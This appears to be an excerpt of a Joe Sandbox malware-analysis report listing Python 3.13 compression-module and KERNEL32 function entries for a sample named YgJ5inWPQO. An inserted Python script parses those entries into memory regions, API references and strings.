                                                                                                                                                                                                      • API ID: Dealloc$Bytes_FromSizeStringmemcpy
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.
                                                                                                                                                                                                      • API String ID: 76732796-2565006440
                                                                                                                                                                                                      • Opcode ID: b929f9677e0643720c4865ccbd9dde636c951ab58911de356605792b00dfea6a
                                                                                                                                                                                                      • Instruction ID: b4f39ef3d1910344d71b70b05349bc550276b61577ad65eadc8a52de15481719
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b929f9677e0643720c4865ccbd9dde636c951ab58911de356605792b00dfea6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41EAB6A09A0685EB559F3AD850279B3A0FB48F94F08A032DF1E47765CF38DC92C304
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDict_New.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB6102D1
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6103F8: PyLong_FromUnsignedLongLong.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610410
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6103F8: PyUnicode_InternFromString.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610421
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6103F8: PyDict_SetItem.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61043C
                                                                                                                                                                                                      • PyErr_Format.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB615580
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61559C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_FromLong$DeallocErr_FormatInternItemLong_StringUnicode_Unsigned
                                                                                                                                                                                                      • String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
                                                                                                                                                                                                      • API String ID: 1484310907-3368833446
                                                                                                                                                                                                      • Opcode ID: 0d766450421b01eefe42396fddca15447d36c2f595c72f33b576de2da6cedc60
                                                                                                                                                                                                      • Instruction ID: 0c6ba90d3b080bcc366315f7975d560d2f01baebdca80322cbe3d50790a3062d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d766450421b01eefe42396fddca15447d36c2f595c72f33b576de2da6cedc60
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D410CB1E08A0786EE684B3EDD41178B361FB05794B44E132DB2E466B0EF6CEC648709
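The function entries above repeat the same three machine-readable line shapes: the "Source File"/"Associated" memory-dump names, the "APIs" call references (including the indented "Part of subcall function" lines) and the "$"-separated "String ID" list. The following parser turns one such entry into a structured record so that the dumps of a module can be ranked by protection (only the PAGE_EXECUTE_READ region is worth disassembling) and the API references grouped by exporting module. It is an added example for this page, not Joe Sandbox code. The field layout of the .sdmp name is an assumption inferred from the values in this report: the fifth and seventh dot-separated fields hold exactly the winnt.h values PAGE_EXECUTE_READ/PAGE_READONLY/PAGE_READWRITE and MEM_IMAGE, so they are decoded as such, and the other fields are only labelled, not interpreted. The trailing "Download File" link text that extraction appended to the Associated lines is tolerated and discarded, and the sample input is the PYTHON313 entry above, embedded verbatim.

```python
"""Structured parse of the per-function "APIs" / "Memory Dump Source" /
"String ID" lines of a Joe Sandbox report.

Added example for this page; it is not Joe Sandbox's own code, and the
meaning assigned to the dump-name fields below is an assumption inferred
from the values in the report (see the lead-in)."""
import re
from collections import Counter

# winnt.h constants (documented by Microsoft). That the 5th and 7th dump-name
# fields hold a PAGE_* protection and a MEM_* type is an ASSUMPTION: the values
# seen in the report (0x20, 0x02, 0x04 and 0x01000000) are exactly these constants.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}

# <proc>.<dump>.<id>.<base>.<protect>.<flags>.<type>.<module>.sdmp
# Group names other than base/protect/type are labels of convenience, not
# documented semantics; those fields are kept raw.
DUMP_RE = re.compile(
    r"(?P<proc>\d{8})\.(?P<dump>\d{8})\.(?P<id>\d+)\.(?P<base>[0-9A-F]{16})\."
    r"(?P<protect>[0-9A-F]{8})\.(?P<flags>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\."
    r"(?P<module>[0-9A-F]{8})\.sdmp"
)
SOURCE_RE = re.compile(r"Source File: (?P<dump>\S+?\.sdmp), Offset: (?P<offset>[0-9A-F]{16})")
# Trailing "Download File" is link text left over from the HTML report; the
# non-greedy match stops at ".sdmp" and drops it.
ASSOC_RE = re.compile(r"Associated: (?P<dump>\S+?\.sdmp)")
STRING_RE = re.compile(r"String ID: (?P<ids>.*)$")
API_RE = re.compile(
    r"(?:Part of subcall function (?P<parent>[0-9A-F]{16}): )?"
    r"(?P<func>[A-Za-z_][\w@?$]*)\.(?P<mod>[A-Za-z0-9_.-]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{16})"
)


def parse_dump_name(name: str) -> dict:
    """Decode one .sdmp file name into base address, protection and region type."""
    m = DUMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    protect, mtype = int(m["protect"], 16), int(m["type"], 16)
    return {
        "name": name,
        "base": int(m["base"], 16),
        "module": int(m["module"], 16),
        "protection": PAGE_PROTECTION.get(protect, f"0x{protect:X}"),
        "type": MEM_TYPE.get(mtype, f"0x{mtype:X}"),
        "executable": bool(protect & 0xF0),  # every PAGE_EXECUTE* value sets a bit in 0xF0
    }


def parse_function_block(text: str) -> dict:
    """Parse the lines of one function entry; returns regions, API refs and strings."""
    regions, apis, strings, offset = [], [], [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := SOURCE_RE.match(line):
            offset = int(m["offset"], 16)
            regions.append(parse_dump_name(m["dump"]))
        elif m := ASSOC_RE.match(line):
            regions.append(parse_dump_name(m["dump"]))
        elif m := STRING_RE.match(line):  # anchored: "API String ID:" must not match
            # '$' is the report's separator; a literal '$' inside a string would mis-split.
            strings = m["ids"].split("$")
        elif m := API_RE.match(line):
            apis.append({
                "func": m["func"], "module": m["mod"], "ref": int(m["ref"], 16),
                "parent": int(m["parent"], 16) if m["parent"] else None,
                "args": tuple(m["args"].split(",")),
            })
    module_base = min((r["base"] for r in regions), default=None)
    # Sanity check: the lowest dumped region should be the module base the report
    # gives as "Offset"; anything else means a dump is missing or the field
    # assumption above is wrong for this report.
    if offset is not None and module_base != offset:
        raise ValueError(f"Offset {offset:#x} != lowest region base {module_base:#x}")
    return {"module_base": module_base, "regions": regions, "apis": apis, "strings": strings}


def imports_by_module(block: dict) -> dict:
    """Count API references per exporting module, e.g. {'PYTHON313': 6}."""
    return dict(Counter(a["module"] for a in block["apis"]))


# Sample input: the PYTHON313 function entry copied from the report above.
SAMPLE = """
• PyDict_New.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB6102D1
  • Part of subcall function 00007FFBBB6103F8: PyLong_FromUnsignedLongLong.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610410
  • Part of subcall function 00007FFBBB6103F8: PyUnicode_InternFromString.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610421
  • Part of subcall function 00007FFBBB6103F8: PyDict_SetItem.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61043C
• PyErr_Format.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB615580
• _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61559C
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
• String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
"""

if __name__ == "__main__":
    block = parse_function_block(SAMPLE)
    print(f"module base {block['module_base']:#x}, imports {imports_by_module(block)}")
    for r in block["regions"]:
        print(f"  {r['base']:#x} {r['protection']:<22} {r['type']}{'  <- code' if r['executable'] else ''}")
    for a in block["apis"]:
        via = f" (via {a['parent']:#x})" if a["parent"] else ""
        print(f"  {a['ref']:#x}: {a['module']}!{a['func']}{via}")
```

Run on the sample, the module base resolves to 0x7FFBBB600000 with one executable region at 0x7FFBBB601000, six PYTHON313 references (three of them reached through the subcall at 0x7FFBBB6103F8) and the four strings of the entry. The same parser accepts the hyphenated API-set module names that appear in other entries of this report (API-MS-WIN-CRT-STRING-L1-1-0); the "Offset" cross-check is there so that a mis-parsed or missing dump fails loudly instead of silently mis-attributing a region to the wrong module.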
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45729
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45737
                                                                                                                                                                                                      • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45750
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45762
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD457D0
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD457DC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 916704608-2084034818
                                                                                                                                                                                                      • Opcode ID: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                      • Instruction ID: 00a9d92c0e5764f87a9190e84c92ad30c35ee13cb1fa6d48beff1394020b801e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D31A1F9B1A642D2EE11EB2AE8485B56394BF04B64F590535DF2D07390EF3CE544C308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocString$AppendBytes_Err_FromList_Size
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.$avail_out is non-zero in _BlocksOutputBuffer_Grow().
                                                                                                                                                                                                      • API String ID: 1563898963-3455802345
                                                                                                                                                                                                      • Opcode ID: 7038bb454f586ae4dad1402c0e0bde3884d53d6ff29d73da2e3d1cdb120589a6
                                                                                                                                                                                                      • Instruction ID: c204eae3fdf9d94cf4f98554142e31014329b1e50ceda09271b9d637ee08286f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7038bb454f586ae4dad1402c0e0bde3884d53d6ff29d73da2e3d1cdb120589a6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6310DA3A08B4281EA148B3DED44229A7A1FB44BA4F149231DB6F437B5EF7DE951C304
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615CA4
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D07
                                                                                                                                                                                                      • PyList_Append.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D1B
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D37
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D50
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocString$AppendBytes_Err_FromList_Size
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.$avail_out is non-zero in _BlocksOutputBuffer_Grow().
                                                                                                                                                                                                      • API String ID: 1563898963-3455802345
                                                                                                                                                                                                      • Opcode ID: 49b1fd29c3d512e922a83069a7b3722a8aaa4f5746a719be75dd05b010d48014
                                                                                                                                                                                                      • Instruction ID: 5cd08040d29fa34f52fa6961c3d5df011772a44a165b68929bd1761ec31f9072
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b1fd29c3d512e922a83069a7b3722a8aaa4f5746a719be75dd05b010d48014
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831C9A1A19B4681EA148F3DED44239F3A1FB44BA4F14A235DB6E477B4DF7DE8418308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arg_KeywordsLong_ModuleModule_StateType_
                                                                                                                                                                                                      • String ID: BZ2Compressor
                                                                                                                                                                                                      • API String ID: 694278274-1096114097
                                                                                                                                                                                                      • Opcode ID: 0ee3de51229659852c1ac05442395534d45947c7dff83e6d88628dc9d0c49d04
                                                                                                                                                                                                      • Instruction ID: 153f65f4da8f50b26f3c5baebfa954a4d923f9d72ec12556dc9b1746d7d7fbd2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ee3de51229659852c1ac05442395534d45947c7dff83e6d88628dc9d0c49d04
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1021FFA3A08A4285EA549B7DDC84679A3A1FB84B84F488131DB4F477B5DF7CEC51C308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Long$Arg_BufferBuffer_CheckErr_Long_Module_Object_OccurredPositionalReleaseStateUnsignedfreememset
                                                                                                                                                                                                      • String ID: _decode_filter_properties
                                                                                                                                                                                                      • API String ID: 2300122949-1472779162
                                                                                                                                                                                                      • Opcode ID: 04876776030b559b9c37cc04aba1f2f3309115b9832110f2900de013c6a2c948
                                                                                                                                                                                                      • Instruction ID: c5c0ab0347fc25f1720d8b580d9eb8a1d6e2dd03a722546105ef45c9f998b9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04876776030b559b9c37cc04aba1f2f3309115b9832110f2900de013c6a2c948
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF218EA1B04A4685EA148B3AE844679B3A0FB98F84F58D131DB0E43774DF3CED46C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_ThreadThread_acquire_lock$Err_RestoreSaveStringThread_release_lockmemcpy
                                                                                                                                                                                                      • String ID: End of stream already reached
                                                                                                                                                                                                      • API String ID: 180092378-3466344095
                                                                                                                                                                                                      • Opcode ID: db2bc4c0d48d41f655f77b3ca049332d247d461f9ed1c925fb763dcb2ce63ec9
                                                                                                                                                                                                      • Instruction ID: 268b573c548ee68d20ad2607b63135134e5830b1679c70a4d5895b646b1378b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: db2bc4c0d48d41f655f77b3ca049332d247d461f9ed1c925fb763dcb2ce63ec9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3011C6A6A08A4196EA149B2AED44169A764FB89FC4F188031DF5E43765CF3CEC51C308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Eval_ThreadThread_acquire_lock$Err_RestoreSaveStringThread_release_lock
• String ID: Already at end of stream
• API String ID: 2195683152-1334556646
• Opcode ID: 23e90ce53a5e8f7f238537e387acf1ca73c925dc62d0e9b53aaa5db74a180178
• Instruction ID: 6943722435b7d02ce9cafb4e6520cd66eda16f4c811df2ec711589f87f379ea0
• Opcode Fuzzy Hash: 23e90ce53a5e8f7f238537e387acf1ca73c925dc62d0e9b53aaa5db74a180178
• Instruction Fuzzy Hash: 0C11DAA1A18A4185EA589B7AEC44179B765FB88FC4F499031DF0E43765CF3CE8568308
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
• Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lock
• String ID: Compressor has been flushed
• API String ID: 1906554297-3904734015
• Opcode ID: 280152d272f57e6d95092040825aba02ee9c507a64f7b624af6d61e43dc0302a
• Instruction ID: 27ecee6fa108e0e6196bbd9b894747664b87806ae84b24140ff3429cb4782075
• Opcode Fuzzy Hash: 280152d272f57e6d95092040825aba02ee9c507a64f7b624af6d61e43dc0302a
• Instruction Fuzzy Hash: D411CBB2A08A5292EA10DB2EED54169A364FB89BC4B149432DF5F47B74CF3CEC91C744
APIs
• PyThread_acquire_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB609046
• PyThread_release_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB609078
• PyErr_SetString.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6090A8
  • Part of subcall function 00007FFBBB60857C: PyType_GetModuleState.PYTHON313 ref: 00007FFBBB6085B5
  • Part of subcall function 00007FFBBB60857C: PyBytes_FromStringAndSize.PYTHON313 ref: 00007FFBBB6085C9
  • Part of subcall function 00007FFBBB60857C: PyList_New.PYTHON313 ref: 00007FFBBB6085E0
  • Part of subcall function 00007FFBBB60857C: PyEval_SaveThread.PYTHON313 ref: 00007FFBBB608631
  • Part of subcall function 00007FFBBB60857C: PyEval_RestoreThread.PYTHON313 ref: 00007FFBBB60864B
• PyEval_SaveThread.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148A2
• PyThread_acquire_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148B7
• PyEval_RestoreThread.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148C0
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_ModuleSizeStateThread_release_lockType_
• String ID: Compressor has been flushed
• API String ID: 3871537485-3904734015
• Opcode ID: 93de4d5cb0508ffd5a7dfeffd0af339d395ad221db97f1efa8aca5c53164853c
• Instruction ID: 04e2c025984fcedcc7438d83ed1a9201d9deda5b2e05042e404eedd819cfd459
• Opcode Fuzzy Hash: 93de4d5cb0508ffd5a7dfeffd0af339d395ad221db97f1efa8aca5c53164853c
• Instruction Fuzzy Hash: AE11AAA5A08A9281EB58CB2AEC44279B365FB88BC4F589035DF4F47B64CF3CD8568744
